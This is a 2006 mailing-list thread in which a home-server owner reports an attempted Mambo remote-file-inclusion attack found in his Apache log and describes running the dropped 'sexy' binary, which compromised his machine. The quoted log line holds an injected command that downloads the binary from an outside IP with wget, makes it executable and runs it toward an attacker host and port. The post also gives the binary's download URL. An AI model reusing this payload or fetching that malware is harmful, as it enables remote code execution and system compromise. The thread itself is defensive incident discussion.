Re: Strange Apache log and mambo security - sexy executable

[Michael Loftis]

--On January 23, 2006 8:31:40 AM +0100 Maik Holtkamp 
<[EMAIL PROTECTED]> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

yesterday morning I found a strange entry in my apache log files (debian
sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
Server, just serving my Family and some good friends (normally).

- ---cut---
132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&
mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%
20212.20
3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20
YYY;echo|  HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1;)" - ---cut---

As I patched mambo against recent "register global" attack and my /tmp
is mount noexec, the attack doesn't exploit anything.

However, I curiously downloaded this sexy executable to have a closer
look.

- ---cut---
backup:/home/qmb# ./sexy -h
./sexy <host> <port>
- ---cut---

Firstly, don't ever download and run untrusted code as root, especially 
when it's obviously an exploit attempt, unless you run it on an unconnected 
box you're prepared to scrap afterwards.  God knows what the code will do 
to your system.

This host backup (sarge, 2.6.12) is in the second raw of my LAN and just
used to make rsync backups of LAN hosts to usb hds.

Unfortunately, I was that curious, that I decided to strace it (in spite
I hardly understand strace):

- ---cut---
backup:/home/qmb# strace ./sexy
execve("./sexy", ["./sexy"], [/* 20 vars */]) = 0
uname({sys="Linux", node="backup", ...}) = 0
brk(0)                                  = 0x804a000
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
- -1, 0) = 0xb7f13000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or
directory)
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or
directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=30780, ...}) = 0
old_mmap(NULL, 30780, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f0b000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or
directory)
open("/lib/tls/libc.so.6", O_RDONLY)    = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`Z\1\000"...,
512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1254468, ...}) = 0
old_mmap(NULL, 1264780, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) =
0xb7dd6000 old_mmap(0xb7f00000, 36864, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED, 3, 0x129000) = 0xb7f00000
old_mmap(0xb7f09000, 7308, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f09000
close(3)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
- -1, 0) = 0xb7dd5000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd5460,
limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0xb7f0b000, 30780)               = 0
fork()                                  = 11935
fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0) = 0xb7f12000
write(1, "./sexy <host> <port>\n", 21./sexy <host> <port>
)  = 21
munmap(0xb7f12000, 4096)                = 0
exit_group(2)                           = ?
- ---cut---

After this run the box was hardly damaged:

- - It insists on bringing its NIC to promiscuous mode
- - ls, grep, gunzip (probably others, too) just give a segmentation
  fault

I tried to investigate further:

- - tcpdump doesn't show any traffic in the net that shouldn't be there
- - ps ax listed only known processes, all where found in /proc, too
- - Top doesn't show anything strange
- - netstat -tulpen doesn't list any ports listening

Trying rebooting failed totally. It tried to run a lot of grep processes
that didn't run etc.

It took me 2 hours to return to a normal state with this box (booting
knoppix, backup of corrupted /var, blanking the disc, restoring the
backup of the night before).

In spite I am not that familiar with strace and no coder, I suppose that
the program "sexy" damaged the linker (open ld.so.cache) and would have
tried to open a ptty on the IP/port given on the command line (As I did
not give any command line arguments, this failed). Probably the guy/bot
on the other end would have exchanged some libs in this session to
install the real rootkit on the box.

Right?

Not having the binary and not really having time to look at it, it's 
probably just straight up attempting to infect your machine, and that it 
very clearly succeeded in doing.  It didn't however succeed in hiding 
itself, as evidenced by your segfaults.  You're probably running a litle 
different target OS than 'sexy' was built for.


Though I already invested some time (restoring the host backup), I would
be pleased to understand what happened more detailed so any clue is
appreciated.

If somebody wants to have a closer look at the binary, I think you can
still get at:

http://212.203.97.120/sexy

Does it make any sense to complain at the abuse teams of the involved
IPs given in the apache log?

Yes, but again, you shouldn't have been so slow as to run this code, your 
box is completely compromised, and might still be.  Just as you wouldn't 
click on and run an executable in a windows machine that someone had 
emailed to you, you should never execute suspect code, ESPECIALLY as root. 
You handed the keys to your machine over.


TIA.

BTW: The name of the binary "sexy", doesn't make it easier to STFW :(

PS: Sorry, to all I bothered when sending this message to the private
    list ([EMAIL PROTECTED]) first.


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]